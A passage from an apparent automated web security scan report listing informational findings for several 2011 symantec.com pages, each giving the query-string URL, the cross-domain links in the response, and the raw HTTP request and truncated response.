The page was loaded from a URL containing a query string:
http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps

The response contains the following links to other domains:
http://buy.norton.com/?trf_id=symcom&inid=us_ghp_topnav_link1_to_store
http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store
http://buy.norton.com/?trf_id=symcom&inid=us_hho_homepage_topnav1_to_store
http://buy.norton.com/upgrades-renewals?ctry=US&lang=EN&trf_id=symcom&inid=us_hho_errorpage_to_store
http://free.pctools.com/free-antivirus/
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
GET /business/verisign/fraud-detection-service?tid=gnps HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621646660-New%7C1336357646660%3B%20event69%3Devent69%7C1336357646662%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/4
Response
HTTP/1.1 404 Not Found Server: Sun-Java-System-Web-Server/7.0 Content-Length: 22137 Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:30:49 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Error: Page Not Found - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-...[SNIP]... <div id="globalNavMainInner5"> <a href='http://buy.norton.com?trf_id=symcom&inid=us_ghp_topnav_link1_to_store'> Store</a>...[SNIP]... <li><a href="http://buy.norton.com?trf_id=symcom&inid=us_hho_homepage_topnav1_to_store"> Store</a>...[SNIP]... <h3><a href="http://buy.norton.com?trf_id=symcom&inid=us_ghp_topnav_link1_to_store"> Store</a>...[SNIP]... <b><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store"> Norton</a>...[SNIP]... <li><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store"> Welcome</a>...[SNIP]... <li><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store"> Shop Products</a>...[SNIP]... <li><a href="http://buy.norton.com/upgrades-renewals?ctry=US&lang=EN&trf_id=symcom&inid=us_hho_errorpage_to_store"> Renew</a>...[SNIP]... <li><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store"> Shopping Resources</a>...[SNIP]... <li><a href="http://buy.norton.com/?trf_id=symcom&inid=us_hho_errorpage_to_store"> Store Services</a>...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... 
<li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... 
<li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... <li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.60. http://www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://www.symantec.com
Path: /partners/sales-and-marketing/sales-marketing.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp?id=marketing

The response contains the following links to other domains:
http://buy.norton.com/?trf_id=symcom&inid=us_ghp_topnav_link1_to_store
http://free.pctools.com/free-antivirus/
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
GET /partners/sales-and-marketing/sales-marketing.jsp?id=marketing HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://partnerlocator.symantec.com/public/search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; bizProdScrollVertical=0; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp%2525253Fid%2525253Dmarketing%252526ot%25253DA%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 41218 Cache-Control: public, max-age=3577 Date: Fri, 09 Sep 2011 21:39:01 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Marketing - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-...[SNIP]... <div id="globalNavMainInner5"> <a href='http://buy.norton.com?trf_id=symcom&inid=us_ghp_topnav_link1_to_store'> Store</a>...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... 
<li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... 
<li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... <li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.61. http://www.symantec.com/store/products/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://www.symantec.com
Path: /store/products/index.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://www.symantec.com/store/products/index.jsp?inid=us_pagenotfound_smb_store

The response contains the following links to other domains:
http://buy.norton.com/estore/mf/landingProductFeatures?sfid=0DkpLFXQ3kCwDtN5LGxP0QYnM2M1k82n0GYrZ6wYNQkcsXHnc441!2017174390!1267046176849
http://free.pctools.com/free-antivirus/
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
GET /store/products/index.jsp?inid=us_pagenotfound_smb_store HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 28649 Cache-Control: public, max-age=3523 Date: Fri, 09 Sep 2011 21:31:11 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Store Shop Products - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <...[SNIP]... <div style="float:right; text-align:right; padding-top:10px;"> Business Store | <a href="http://buy.norton.com/estore/mf/landingProductFeatures?sfid=0DkpLFXQ3kCwDtN5LGxP0QYnM2M1k82n0GYrZ6wYNQkcsXHnc441!2017174390!1267046176849"> Norton Store</a>...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... 
<li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... 
<li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... <li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.62. http://www.symantec.com/store/resources/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://www.symantec.com
Path: /store/resources/index.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://www.symantec.com/store/resources/index.jsp?inid=us_pagenotfound_smb_store

The response contains the following links to other domains:
http://free.pctools.com/free-antivirus/
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
GET /store/resources/index.jsp?inid=us_pagenotfound_smb_store HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 27682 Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:31:12 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Store Shopping Resources - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... 
<li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... 
<li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.63. http://www.symantec.com/store/services/index.jsp
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/store/services/index.jsp
Issue detail
The page was loaded from a URL containing a query string: http://www.symantec.com/store/services/index.jsp?inid=us_pagenotfound_smb_store
The response contains the following links to other domains: http://free.pctools.com/free-antivirus/ http://us.norton.com/ http://us.norton.com/antivirus/ http://us.norton.com/ghost/ http://us.norton.com/internet-security/ http://us.norton.com/nortonlive/free-pc-checkup.jsp http://us.norton.com/nortonlive/spyware-virus-removal.jsp http://us.norton.com/security_response/malware.jsp http://us.norton.com/security_response/phishing.jsp http://us.norton.com/security_response/spyware.jsp http://www.backup.com/ http://www.pctools.com/file-recover/ http://www.pctools.com/password-manager/ http://www.pctools.com/performance-toolkit/ http://www.pctools.com/privacy-guardian/ http://www.pctools.com/registry-mechanic/ http://www.pctools.com/simple-backup/ http://www.pctools.com/spyware-doctor-antivirus/ http://www.pctools.com/spyware-doctor/ http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html http://www.verisign.com/authentication/two-factor-authentication/index.html http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html http://www.verisign.com/code-signing/index.html http://www.verisign.com/ssl/index.html http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html http://www.verisign.com/ssl/ssl-information-center/index.html http://www.verisign.com/trust-seal/index.html http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
